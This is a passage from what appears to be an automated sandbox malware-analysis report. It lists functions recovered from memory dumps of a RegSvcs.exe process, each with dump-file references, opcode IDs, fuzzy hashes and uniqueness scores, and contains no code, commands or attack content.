                                              • Instruction Fuzzy Hash: 1E21AEB0A1164ADFCF20DF59E8C4CEABBBAFF843107108566D64597651C730B950CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C3E40 Relevance: .1, Instructions: 63COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a2cd50b319089ab008161abbe09de8856d0030f1800f059a69890fbcf762b008
                                              • Instruction ID: 2a2a9350875715b6ce66df25ee64f435aeedf6ebd3f8435a6e56a163f989be73
                                              • Opcode Fuzzy Hash: a2cd50b319089ab008161abbe09de8856d0030f1800f059a69890fbcf762b008
                                              • Instruction Fuzzy Hash: 591159312083499FCB069B38D48485D7FBAEFC63103244067E549C7253CB21DC96CB52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073525D5 Relevance: .1, Instructions: 63COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f5ab1d8bb4062ebc80fea98c9964dab49028612e2983759b451ee5aec009fde7
                                              • Instruction ID: 3b09715b85964e5e967461d8ae5f5a27123cc56e497f798eba10824ca8b8a675
                                              • Opcode Fuzzy Hash: f5ab1d8bb4062ebc80fea98c9964dab49028612e2983759b451ee5aec009fde7
                                              • Instruction Fuzzy Hash: 8F210A74A002549FCB06DF28D8548AE7FB5FF85321F148196DC558B396CB34AD05DBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07355CE8 Relevance: .1, Instructions: 63COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 81453da0cf4e560c20a93e4d0f0a908b4535c8e8b6484991e8305e2857032688
                                              • Instruction ID: 5781cb6a1958d7a7e3a7f5a2d411690c7d3b0d4995c8abad445db86c0f0b671e
                                              • Opcode Fuzzy Hash: 81453da0cf4e560c20a93e4d0f0a908b4535c8e8b6484991e8305e2857032688
                                              • Instruction Fuzzy Hash: C711C8B7B006215FD3259A689C44F6BB7E6EBC8760F11417AEE19DB394DE70EC018790
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073508C0 Relevance: .1, Instructions: 62COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 51cae69f7c2e6ca9721c024f79960c6793efdb0fd2e5672914ba0dcb83007910
                                              • Instruction ID: ea55f1327c9b037d1a6167a5be179f56f9f9fb4ca33b0b6152aeaeafef6e76f1
                                              • Opcode Fuzzy Hash: 51cae69f7c2e6ca9721c024f79960c6793efdb0fd2e5672914ba0dcb83007910
                                              • Instruction Fuzzy Hash: A1114676F00215CBEB289BB5D458AEEBBBAAF88720F140029D90AF3354DF715D45CB94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B7DC8 Relevance: .1, Instructions: 62COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b3f76d18da28068c82c2822cbb1d42ae84020047b4cc593b0c5ce8f8a3d33daf
                                              • Instruction ID: bc0d3e9b6cedaf57f7fa9af0ace9d7eb2726ad29639690f19876699adeb073ba
                                              • Opcode Fuzzy Hash: b3f76d18da28068c82c2822cbb1d42ae84020047b4cc593b0c5ce8f8a3d33daf
                                              • Instruction Fuzzy Hash: 1011BE713043838FD7249BB8D484A6EBBB2FFC9354714456ED6468B342DB759C05C791
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073CA100 Relevance: .1, Instructions: 61COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: eb912313dad1243f84e090c8fab2cf1094dd2199a2e13fb2bbebcec1fbdbd5e1
                                              • Instruction ID: 9b66a49fdfecdea5d2a1a1b2f6507259d539835251b5d5a8013e3f24b6cd215b
                                              • Opcode Fuzzy Hash: eb912313dad1243f84e090c8fab2cf1094dd2199a2e13fb2bbebcec1fbdbd5e1
                                              • Instruction Fuzzy Hash: 0821C370A00205DFDF4AFB34E448A9D7BB2EF81354B50866DC5059F385EB719A06CBD1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C9DE1 Relevance: .1, Instructions: 61COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c7f28ca6423a2194bc768c72816eb17f0ce76c8e1d39816359535a631c293c10
                                              • Instruction ID: 82af8663f6ee53a8de3759939e1ca6556ab33baf7a72beea827d193720323836
                                              • Opcode Fuzzy Hash: c7f28ca6423a2194bc768c72816eb17f0ce76c8e1d39816359535a631c293c10
                                              • Instruction Fuzzy Hash: B9117F70B401049FDB18DB29C498BADBBE6AF88720F15409AE906AF3A1CA719C41CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0735A408 Relevance: .1, Instructions: 61COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1606bfe7d33a028b99d2fb80f26efd632de7a85424d255e0763b2eaf8998d77d
                                              • Instruction ID: c1cafa65e6c4f4e4056e68e57cb00a327354bd51b7e924bf9f1e41f903b036a1
                                              • Opcode Fuzzy Hash: 1606bfe7d33a028b99d2fb80f26efd632de7a85424d255e0763b2eaf8998d77d
                                              • Instruction Fuzzy Hash: FB0196F03181326BE72415AE984DB677DCF9BC5750F54C23AAE0EC7784DE65C8419261
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B7248 Relevance: .1, Instructions: 61COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8d64e90a42fc4ecb7ee0173b31ee901c432f837d960c27225502482e35984032
                                              • Instruction ID: 7eb0298b7abb064ecb64c85f58f6f87f97d2248ac0d43e184a6a962e69c54f3a
                                              • Opcode Fuzzy Hash: 8d64e90a42fc4ecb7ee0173b31ee901c432f837d960c27225502482e35984032
                                              • Instruction Fuzzy Hash: 4D11B170201745AFD71ADB38E84485ABFF2EFC13143148A6DD06A8B652DF71A94AC790
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072BFC59 Relevance: .1, Instructions: 61COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 19c0b98d99caeea59fc1182be9de83c41f9a82443945426fabbb0bda1381d73e
                                              • Instruction ID: d39624b7c70c0644ef1b58cf14bf46f95269c33fdd7e3b8dda4315889db70994
                                              • Opcode Fuzzy Hash: 19c0b98d99caeea59fc1182be9de83c41f9a82443945426fabbb0bda1381d73e
                                              • Instruction Fuzzy Hash: E01129B52243529FC735CA759A805FABBEAAF82354B1C8C5ED88147916D2B2E8C1C790
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0737F0D8 Relevance: .1, Instructions: 60COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4659837914.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7370000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 67b16e439eb3e5254f8db7e9d5915875f9b1a1c086dc3c530613d0eaa566cda0
                                              • Instruction ID: 7c15a51f428a4891ed54f93e8b4c9b0465cff0818960a3b6e747f448115218be
                                              • Opcode Fuzzy Hash: 67b16e439eb3e5254f8db7e9d5915875f9b1a1c086dc3c530613d0eaa566cda0
                                              • Instruction Fuzzy Hash: 1811ECF5928103CBFA6D6BA4E40E62A3A7DBB43303F8C0155E00BC6946CF3C6903CA56
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073526F0 Relevance: .1, Instructions: 60COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: aec4a66546ed48538b02237b8d55a7cbf1bf1c1f6fc28f3c079de19f2d4b54c4
                                              • Instruction ID: ddce7de170dbb7e756b778c842574abee840858a49abbb0c8537f106a4a9269a
                                              • Opcode Fuzzy Hash: aec4a66546ed48538b02237b8d55a7cbf1bf1c1f6fc28f3c079de19f2d4b54c4
                                              • Instruction Fuzzy Hash: 1311A3BAA006199FEB10DA58E840A9EF7E4FF84320F144575D91DD7601D770A9148BD1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B2B88 Relevance: .1, Instructions: 60COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3653bde04eedcb63656b95d35e4df8a077fa6ddf540527adf843388c3bdb9dd9
                                              • Instruction ID: b88c1741d78bad2650102a681510b2974f9db717e215fdd399e6fd5d0dc3cdf0
                                              • Opcode Fuzzy Hash: 3653bde04eedcb63656b95d35e4df8a077fa6ddf540527adf843388c3bdb9dd9
                                              • Instruction Fuzzy Hash: 6C11C4B1A21305DBDB259B14D9597EF7BF1FB88390F240569D1016B240CBB28D01DB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073525CF Relevance: .1, Instructions: 58COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bbcc3e9cac68345fc7ced014c7043fb5fbccc5d5f50edb826af0bbd472ed991d
                                              • Instruction ID: a0c59423cc05cd61168fa5ceaea1f3addae72aac0f251ccfc13f44ae5d1dcc32
                                              • Opcode Fuzzy Hash: bbcc3e9cac68345fc7ced014c7043fb5fbccc5d5f50edb826af0bbd472ed991d
                                              • Instruction Fuzzy Hash: AD11BEB5B000189FCB04EF68D8548AEB7B6FF88321F508025EC058B354DF34AD15CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C9DF0 Relevance: .1, Instructions: 57COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7ef9dccc82348d8f810fec33a6396a516cb4dc2abecde42909b90314fb5c8519
                                              • Instruction ID: 57848e45b6dad9484d1e3bd2572240fa945b7b0edd9ef6d9f9c2a0ecdb966f0f
                                              • Opcode Fuzzy Hash: 7ef9dccc82348d8f810fec33a6396a516cb4dc2abecde42909b90314fb5c8519
                                              • Instruction Fuzzy Hash: BC112470B50104DFDB14DB69C498BADBBF6EF88711F154059E906AB3A1CE719C41CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07359A78 Relevance: .1, Instructions: 57COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 76d108955332bd14e7826fecf176e9e7191ec9a2ce1309a24cb3148385ded32a
                                              • Instruction ID: 03983851da4de1c870539c72611f15b51c895c2a12765e69aa768b39d13841d7
                                              • Opcode Fuzzy Hash: 76d108955332bd14e7826fecf176e9e7191ec9a2ce1309a24cb3148385ded32a
                                              • Instruction Fuzzy Hash: 3B11C872310304BFE704DF98E845EABBBE9FB88310F10452AF608CB241DB71E90587A0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07359A68 Relevance: .1, Instructions: 57COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b13a7019925eda12f583dc1784ce0d67045dc550bac6cc583ac4b581291e1fa9
                                              • Instruction ID: bda03f6d63a30a8896e80efbc135f115d092eea75e42fedc4a8bd77cc3b1ef3d
                                              • Opcode Fuzzy Hash: b13a7019925eda12f583dc1784ce0d67045dc550bac6cc583ac4b581291e1fa9
                                              • Instruction Fuzzy Hash: EA118271304305BFE715CF64E855EAB7FB9FB89310F14455AF504CB291DB71A90587A0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B4F98 Relevance: .1, Instructions: 57COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ab82f70ad7ca715cb7db52c1e2690df067caf104d90b384c319febd8cb2cc920
                                              • Instruction ID: 80ffecf136f0d747fb4671ca43b5094491cb22e62d70e649839e144e7a82968b
                                              • Opcode Fuzzy Hash: ab82f70ad7ca715cb7db52c1e2690df067caf104d90b384c319febd8cb2cc920
                                              • Instruction Fuzzy Hash: 7F112971705382CFE322AF69E4C4A2A7BA6EBD93C4B05806AE449CF346CB75DC029751
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C0888 Relevance: .1, Instructions: 56COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1f57a95b6665a65b9bda8a739a8c6bde3ce3fbde2d1f7ab81e44ac20f8a6283d
                                              • Instruction ID: 8fd63ca29d4604181c35e4058e04fb1f28de9cf294e9935b6f6e46a862e9f349
                                              • Opcode Fuzzy Hash: 1f57a95b6665a65b9bda8a739a8c6bde3ce3fbde2d1f7ab81e44ac20f8a6283d
                                              • Instruction Fuzzy Hash: 0F11547160034BDBEB09EF2DE840A9E3F95EBC0344B00A61DD5199B355EFB4AD4597D0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073537E8 Relevance: .1, Instructions: 56COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2a76338a9b393c93b40acadc9161ecd6c4243694c15a17dbbc8532569ff77f94
                                              • Instruction ID: 631d5cb3edcbc609c2b6a0fd2767544bdce8d0ddbd8f133407d80dcda9d246f7
                                              • Opcode Fuzzy Hash: 2a76338a9b393c93b40acadc9161ecd6c4243694c15a17dbbc8532569ff77f94
                                              • Instruction Fuzzy Hash: 3C1120B0B10205EFD718EA69C840A6ABBF6FBC8314F000528DA4A9B351DF30EC0987A0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B3928 Relevance: .1, Instructions: 56COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 545725e8ca4de856fa4b8a612ce2d4cad83a8230c1e0b20b8e8e416b784f7f9d
                                              • Instruction ID: 16f7d8c67e01f55f31924df2b33de6d3cbe5aa79fe96d2ba8c473cbf72d61e79
                                              • Opcode Fuzzy Hash: 545725e8ca4de856fa4b8a612ce2d4cad83a8230c1e0b20b8e8e416b784f7f9d
                                              • Instruction Fuzzy Hash: CB114C713102069BD714EF6AE4806AE7BA7FFC4350F00852DE50A87745EFB0AD0687A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0115D49B Relevance: .1, Instructions: 56COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4532294306.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_115d000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                              • Instruction ID: 0138dc5601aecd585d3bf1c8df5cd4fc51211d1e74f74d2c728312f77607b43c
                                              • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                              • Instruction Fuzzy Hash: E9119DB6504280CFDF16CF54D5C4B16BF71FB84328F2485A9DD094A266C33AD45ACBA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0735F111 Relevance: .1, Instructions: 55COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7c6b152fb885001509f96ad38fac2c82073aa04ece607ed4a130b3794842392a
                                              • Instruction ID: 172987526dc76370c640128dcc113992dc2454e1b9ead435faa0e0c4d947d2d1
                                              • Opcode Fuzzy Hash: 7c6b152fb885001509f96ad38fac2c82073aa04ece607ed4a130b3794842392a
                                              • Instruction Fuzzy Hash: D91104B0304342EFE729AA76C850867BBF6AFCA22474444BECC4A8B351CD35D942CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B6F20 Relevance: .1, Instructions: 54COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 13acc2d3112930aa3a29fdcb6fd667ba0d742353186041c721796c511311c2ad
                                              • Instruction ID: ba89cfa436f453da72fd6f1f5821c45adfbe8725725d0c90b44f7fedf254e549
                                              • Opcode Fuzzy Hash: 13acc2d3112930aa3a29fdcb6fd667ba0d742353186041c721796c511311c2ad
                                              • Instruction Fuzzy Hash: 6E11A1716052568FCB21CF58D48499ABBF5EF85360319C5AAE8898B312D730FC01CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0116D0F7 Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4532907762.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_116d000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                              • Instruction ID: de29352bfd9e325437f683fc1402e181614c86ad086c150723e8ae9b73a2d612
                                              • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                              • Instruction Fuzzy Hash: 0311BB76604284CFDB0ACF54E9C4B15BBA1FB84214F28C6A9D8494B256C37BD45ACB62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0735C6B2 Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 569682816c60d6fb7811dc5aab19adde5a61687e0b141f3ba1bea4cded160e82
                                              • Instruction ID: 2793e24c777a8b7e0e175dddae13a99418873fd6efb820394eb0fbb29105f201
                                              • Opcode Fuzzy Hash: 569682816c60d6fb7811dc5aab19adde5a61687e0b141f3ba1bea4cded160e82
                                              • Instruction Fuzzy Hash: 8C1112712047468FD716DF29D84098BBFF5EF85350B009A2DE5858B661EBB0BD058BD0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B1938 Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 06f376b5e11ab241313ed481c5446b5d3838bc65345747adb5d22aacab8836ae
                                              • Instruction ID: 2063001475c643efc97d43c93b3a3a0374347fab3419478e348efc272cdb18e6
                                              • Opcode Fuzzy Hash: 06f376b5e11ab241313ed481c5446b5d3838bc65345747adb5d22aacab8836ae
                                              • Instruction Fuzzy Hash: E011C2707205049FDB149B29C529BAE7BF2AB8C710F114069E502EB3A1CFB09E01DBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07355CD7 Relevance: .1, Instructions: 52COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c7dd3ca3bdad86bc01b8089507ee6779bb9675d46158d165efc2c7d8ecc8700b
                                              • Instruction ID: 53f4e546e3fbcc8d660ad7596993d71cd0a695116bf8fa8d432303d263ec94ae
                                              • Opcode Fuzzy Hash: c7dd3ca3bdad86bc01b8089507ee6779bb9675d46158d165efc2c7d8ecc8700b
                                              • Instruction Fuzzy Hash: 6E0128B27046209FD325DA68D840E9BBBE5EF89760B04416AE948CB351DA30DC02C7A0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B7258 Relevance: .1, Instructions: 51COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 983ff9a82354a73cf891a6dd2a18e0f2a3e85c6f25f45f83356c5aa0c31452c6
                                              • Instruction ID: 279fe2036ff41978bb26b2e85ec77c69bcb43bdfc34891a6d8708c8e7561e15b
                                              • Opcode Fuzzy Hash: 983ff9a82354a73cf891a6dd2a18e0f2a3e85c6f25f45f83356c5aa0c31452c6
                                              • Instruction Fuzzy Hash: 76117030201705EBD729DB68E84485AFFE2FFC13247148A2DD16A8BA51DFB1AD0AC7D0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07359B08 Relevance: .0, Instructions: 50COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6f0e911af5dd0a8ff45f00835df1f3fd9855049fc0a5ede0be3f45d6331fc6d9
                                              • Instruction ID: 7319ba65f86618700a0aa3ef1819364519f69178a617aab877fa6ac9b68009a2
                                              • Opcode Fuzzy Hash: 6f0e911af5dd0a8ff45f00835df1f3fd9855049fc0a5ede0be3f45d6331fc6d9
                                              • Instruction Fuzzy Hash: 1C1161312047459FD72ADF29E84088BBFF5EF85350B00C62DE5998B622EB70BD098B90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0735F120 Relevance: .0, Instructions: 50COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3b4e0a684f75041f76a7368f60f6fb4e0c59a0c9905ce9272d0c41db5c0157b6
                                              • Instruction ID: bbdc80995e591637c8a18fd1fd17a8b1aef016769bfb2b21cd897b0d3679c142
                                              • Opcode Fuzzy Hash: 3b4e0a684f75041f76a7368f60f6fb4e0c59a0c9905ce9272d0c41db5c0157b6
                                              • Instruction Fuzzy Hash: 0801B1B4300302CBE72C9A36C98082777EBBFCA225754847DCD0A4B755CE31D942CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

